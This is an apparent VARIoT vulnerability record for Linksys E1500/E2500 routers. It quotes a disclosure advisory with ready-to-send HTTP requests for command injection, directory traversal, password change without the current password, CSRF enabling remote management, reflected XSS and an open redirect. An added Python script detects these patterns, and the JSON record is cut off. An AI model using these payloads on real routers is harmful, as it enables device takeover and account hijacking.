VAR-201302-0530
Vulnerability from variot - Updated: 2022-05-17 02:00

An attacker could exploit the vulnerability to access the system and other configuration files and perform unauthorized operations in the context of the user's session. An attacker can exploit a vulnerability to redirect a user to a potentially malicious website for a phishing attack. The vulnerability is due to a lack of proper validation of the ping_size parameter, which could allow an attacker to inject and execute arbitrary shell commands. An attacker exploiting this vulnerability could change the current password without knowing it. The attacker needs an authenticated browser to access it. The Cisco Linksys E1500 Router is a wireless router device. A directory traversal vulnerability exists in the Cisco Linksys E1500 Router. An attacker can send a specially crafted URL request containing a "dot" sequence (/.. /) in the next_page parameter to view any file on the system. A command-execution vulnerability
2. A security-bypass vulnerability
3. A cross-site request-forgery vulnerability
4. A directory-traversal vulnerability
6. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files.
The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.
Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...
============ Vulnerable Firmware Releases - e1500: ============
Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011
Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012
Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012
============ Vulnerable Firmware Releases - e2500: ============
Firmware Version: v1.0.03 (only tested for known OS command injection)
Other versions may also be affected. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Diagnostics.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
Changing the request method from HTTP POST to HTTP GET makes exploitation easier:
http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png
* Directory traversal - tested on E1500:
=> parameter: next_page
Access local files of the device.
Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png
* Changing the current password does not require the current password - tested on E1500
With this vulnerability an attacker is able to change the current password without knowing it.
Example Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
* CSRF for changing the password without knowing the current one; the attacker is also able to activate remote management - tested on E1500:
http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
* Reflected Cross Site Scripting - tested on E1500
=> Parameter: wait_time=3'%3balert('pwnd')//
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png
* Redirection - tested on E1500
=> Parameter: submit_button=http://www.pwnd.pwnd%0a
Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-004
Twitter: @s3cur1ty_de
============ Time Line: ============
October 2012 - discovered vulnerability
21.10.2012 - contacted Linksys with vulnerability details
23.10.2012 - Linksys requested to check new firmware v1.0.05 build 1
27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1
27.10.2012 - contacted Linksys with vulnerability details in release v1.0.05 build 1
29.10.2012 - Linksys responded with case number
13.11.2012 - /me requested update of the progress
15.11.2012 - Linksys sends Beta Agreement
16.11.2012 - Linksys sends the Beta Firmware for testing
16.11.2012 - tested Beta version
18.11.2012 - informed Linksys about the results
30.11.2012 - reported the same OS Command injection vulnerability in model E2500
10.12.2012 - /me requested update of the progress
23.12.2012 - Update to Linksys with directory traversal vulnerability
09.01.2013 - Case closed
05.02.2013 - public release
===================== Advisory end =====================
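Every issue in the advisory above is reached through the same apply.cgi endpoint and is distinguishable by the shape of one request parameter. The following Python is an added example, not part of the advisory or the VARIoT record: it parses an apply.cgi request (query string plus form body) and reports which of the advisory's patterns it matches, so a defender with a proxy or IDS capture of the management interface can flag them. The sample requests are constructed from the advisory's own examples; the function and indicator names are this example's, not the firmware's.

```python
"""Classify Linksys E1500/E2500 apply.cgi requests by the parameter
patterns the advisory documents (added example, not project code)."""
import re
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that should never appear in a numeric ping size.
SHELL_META = re.compile(r"[&;|`$\n]")


def apply_cgi_params(method, target, body=""):
    """Merge query-string and form-body parameters of an apply.cgi request.

    Returns None when the request is not for /apply.cgi.  Only the first
    value of each parameter is kept; that is enough for these checks."""
    parts = urlsplit(target)
    if not parts.path.endswith("/apply.cgi"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return {key: values[0] for key, values in params.items()}


def classify(method, target, body=""):
    """Return the list of advisory findings the request matches ([] = clean)."""
    p = apply_cgi_params(method, target, body)
    if p is None:
        return []
    hits = []
    # OS command injection: ping_size must be a plain number.
    if SHELL_META.search(p.get("ping_size", "")):
        hits.append("os-command-injection:ping_size")
    # Directory traversal: next_page must not climb out of the web root.
    next_page = p.get("next_page", "")
    if "../" in next_page or "..\\" in next_page:
        hits.append("directory-traversal:next_page")
    # Reflected XSS: wait_time is reflected into a script; digits only.
    if not re.fullmatch(r"\d*", p.get("wait_time", "")):
        hits.append("reflected-xss:wait_time")
    # Open redirect: submit_button is a page name, never a URL or a newline.
    submit_button = p.get("submit_button", "")
    if "://" in submit_button or "\n" in submit_button or "\r" in submit_button:
        hits.append("open-redirect:submit_button")
    # Password change without the current password, the CSRF target;
    # enabling remote management in the same request widens the exposure.
    if p.get("PasswdModify") == "1" and "http_passwd" in p:
        hits.append("password-change-without-current-password")
        if p.get("remote_management") == "1":
            hits.append("remote-management-enabled")
    return hits


# Constructed sample requests (method, target, body), built from the
# advisory's examples; the last two are benign controls.
SAMPLE_REQUESTS = [
    ("POST", "/apply.cgi",
     "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping"
     "&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26"
     "&ping_times=5&traceroute_ip="),
    ("POST", "/apply.cgi",
     "submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version"),
    ("GET", "http://192.168.1.1/apply.cgi?submit_button=Management&change_action="
            "&action=Apply&PasswdModify=1&http_passwd=password1"
            "&http_passwdConfirm=password1&remote_management=1&http_wanport=8080", ""),
    ("POST", "/apply.cgi",
     "submit_button=Wireless_Basic&action=Apply&wait_time=3'%3balert('pwnd')//&ssid_24g=Cisco"),
    ("POST", "/apply.cgi",
     "submit_button=http://www.pwnd.pwnd%0a&action=Apply&wait_time=3&ssid_24g=Cisco01589"),
    ("POST", "/apply.cgi",
     "submit_button=Diagnostics&submit_type=start_ping&ping_ip=1.1.1.1&ping_size=32&ping_times=5"),
    ("GET", "/Diagnostics.asp", ""),
]


def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; returns one findings list per request."""
    return [classify(method, target, body) for method, target, body in requests]


if __name__ == "__main__":
    for (method, target, _), findings in zip(SAMPLE_REQUESTS, scan()):
        print(f"{method} {target[:40]:40} -> {findings or 'clean'}")
```

Percent-decoding happens after the query string is split on `&`, which is why an encoded `%26` inside ping_size survives as a literal ampersand in the value and is caught, while the same character as a parameter separator is not. The checks are allow-list shaped (digits only, no `..`, no scheme), which is also the validation the firmware itself is missing.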
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0530",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linksys e1500 router",
"scope": null,
"trust": 3.0,
"vendor": "cisco",
"version": null
},
{
"model": "linksys e1500/e2500 router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Michael Messner",
"sources": [
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
],
"trust": 1.0
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An attacker could exploit the vulnerability to access the system and other configuration files and perform unauthorized operations in the context of the user\u0027s session. An attacker can exploit a vulnerability to redirect a user to a potentially malicious website for a phishing attack. The vulnerability is due to a lack of proper validation of the ping_size parameter, which could allow an attacker to inject and execute arbitrary shell commands. An attacker of this vulnerability could modify the current password if it is not known. The attacker needs an authenticated browser to access it. The Cisco Linksys E1500 Router is a wireless router device. A directory traversal vulnerability exists in the Cisco Linksys E1500 Router. An attacker can send a specially crafted URL request containing a \\\"dot\\\" sequence (/.. /) in the next_page parameter to view any file on the system. A command-execution vulnerability\n2. A security-bypass vulnerability\n3. A cross-site request-forgery vulnerability\n4. A directory-traversal vulnerability\n6. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files. \n\nThe installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page. \n\nSource: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80\u0026app=vw\u0026vw=1\u0026login=1\u0026json=... \n\n============ Vulnerable Firmware Releases - e1500: ============\n\nFirmware-Version: v1.0.00 - build 9 Feb. 17, 2011\nFirmware-Version: v1.0.04 - build 2 M\\xe4r. 8, 2012\nFirmware-Version: v1.0.05 - build 1 Aug. 
23, 2012\n\n============ Vulnerable Firmware Releases - e2500: ============\n\nFirmware Version: v1.0.03 (only tested for known OS command injection)\n\nOther versions may also be affected. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. \nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands. \n\nExample Exploit:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Diagnostics.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 185\nConnection: close\n\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026commit=0\u0026ping_ip=1.1.1.1\u0026ping_size=%26ping%20192%2e168%2e178%2e102%26\u0026ping_times=5\u0026traceroute_ip=\n\nChange the request methode from HTTP Post to HTTP GET makes the exploitation easier:\n\nhttp://192.168.178.199/apply.cgi?submit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026commit=0\u0026ping_ip=1.1.1.1\u0026ping_size=%26COMMAND%26\u0026ping_times=5\u0026traceroute_ip=\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png\n\n * Directory traversal - tested on E1500: \n\n=\u003e parameter: next_page\n\nAccess local files of the device. 
\n\nRequest:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Wireless_Basic.asp\nAuthorization: Basic YWRtaW46YWRtaW4=\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 75\n\nsubmit_type=wsc_method2\u0026change_action=gozila_cgi\u0026next_page=../../proc/version\n\nResponse:\nHTTP/1.1 200 Ok\nServer: httpd\nDate: Thu, 01 Jan 1970 00:00:29 GMT\nCache-Control: no-cache\nPragma: no-cache\nExpires: 0\nContent-Type: text/html\nConnection: close\n\nLinux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png\n\n * For changing the current password there is no request of the current password - tested on E1500 \n\nWith this vulnerability an attacker is able to change the current password without knowing it. 
\n\nExample Request:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.1.1/Management.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 311\n\nsubmit_button=Management\u0026change_action=\u0026action=Apply\u0026PasswdModify=1\u0026http_enable=1\u0026https_enable=0\u0026ctm404_enable=\u0026remote_mgt_https=0\u0026wait_time=4\u0026need_reboot=0\u0026http_passwd=admin\u0026http_passwdConfirm=admin\u0026_http_enable=1\u0026web_wl_filter=0\u0026remote_management=0\u0026nf_alg_sip=0\u0026upnp_enable=1\u0026upnp_config=1\u0026upnp_internet_dis=0\n\n * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: \n\nhttp://\u003cIP\u003e/apply.cgi?submit_button=Management\u0026change_action=\u0026action=Apply\u0026PasswdModify=1\u0026http_enable=1\u0026https_enable=0\u0026ctm404_enable=\u0026remote_mgt_https=0\u0026wait_time=4\u0026need_reboot=0\u0026http_passwd=password1\u0026http_passwdConfirm=password1\u0026_http_enable=1\u0026web_wl_filter=0\u0026remote_management=1\u0026_remote_mgt_https=1\u0026remote_upgrade=0\u0026remote_ip_any=1\u0026http_wanport=8080\u0026nf_alg_sip=0\u0026upnp_enable=1\u0026upnp_config=1\u0026upnp_internet_dis=0\n\n * Reflected Cross Site Scripting - tested on E1500 \n\n=\u003e Parameter: wait_time=3\u0027%3balert(\u0027pwnd\u0027)//\n\nInjecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input. 
\n\nExample Exploit:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Wireless_Basic.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 300\n\nsubmit_button=Wireless_Basic\u0026action=Apply\u0026submit_type=\u0026change_action=\u0026next_page=\u0026commit=1\u0026wl0_nctrlsb=none\u0026channel_24g=0\u0026nbw_24g=20\u0026wait_time=3\u0027%3balert(\u0027pwnd\u0027)//\u0026guest_ssid=Cisco-guest\u0026wsc_security_mode=\u0026wsc_smode=1\u0026net_mode_24g=mixed\u0026ssid_24g=Cisco\u0026_wl0_nbw=20\u0026_wl0_channel=0\u0026closed_24g=0\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png\n\n * Redirection - tested on E1500 \n\n=\u003e Paramter: submit_button=http://www.pwnd.pwnd%0a\n\nInjecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input. 
\n\nExample Exploit:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Wireless_Basic.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 290\n\nsubmit_button=http://www.pwnd.pwnd%0a\u0026action=Apply\u0026submit_type=\u0026change_action=\u0026next_page=\u0026commit=1\u0026wl0_nctrlsb=none\u0026channel_24g=0\u0026nbw_24g=20\u0026wait_time=3\u0026guest_ssid=Cisco01589-guest\u0026wsc_security_mode=\u0026wsc_smode=1\u0026net_mode_24g=mixed\u0026ssid_24g=Cisco01589\u0026_wl0_nbw=20\u0026_wl0_channel=0\u0026closed_24g=0\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png\n\n============ Solution ============\n\nNo known solution available. 
\n\n============ Credits ============\n\nThe vulnerability was discovered by Michael Messner\nMail: devnull#at#s3cur1ty#dot#de\nWeb: http://www.s3cur1ty.de\nAdvisory URL: http://www.s3cur1ty.de/m1adv2013-004\nTwitter: @s3cur1ty_de\n\n============ Time Line: ============\n\nOctober 2012 - discovered vulnerability\n21.10.2012 - contacted Linksys with vulnerability details\n23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1\n27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1\n27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1\n29.10.2012 - Linksys responded with case number\n13.11.2012 - /me requested update of the progress\n15.11.2012 - Linksys sends Beta Agreement\n16.11.2012 - Linksys sends the Beta Firmware for testing\n16.11.2012 - tested Beta version\n18.11.2012 - informed Linksys about the results\n30.11.2012 - reported the same OS Command injection vulnerability in model E2500\n10.12.2012 - /me requested update of the progress\n23.12.2012 - Update to Linksys with directory traversal vulnerability\n09.01.2013 - Case closed\n05.02.2013 - public release\n\n===================== Advisory end =====================\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
}
],
"trust": 3.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57760",
"trust": 4.5
},
{
"db": "PACKETSTORM",
"id": "120079",
"trust": 3.7
},
{
"db": "CNVD",
"id": "CNVD-2013-00966",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00965",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00904",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00962",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00964",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00963",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"id": "VAR-201302-0530",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
}
],
"trust": 4.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 3.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
}
]
},
"last_update_date": "2022-05-17T02:00:07.574000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/120079/linksyse1500e2500-execxssxsrftraversal.txthttp"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/120079/linksyse1500e2500-execxssxsrftraversal.txt"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/57760"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-dir-traversal.png"
},
{
"trust": 0.1,
"url": "http://192.168.178.199/apply.cgi?submit_button=diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026commit=0\u0026ping_ip=1.1.1.1\u0026ping_size=%26command%26\u0026ping_times=5\u0026traceroute_ip="
},
{
"trust": 0.1,
"url": "http://192.168.178.199/diagnostics.asp"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-redirect.png"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-xss.png"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/management.asp"
},
{
"trust": 0.1,
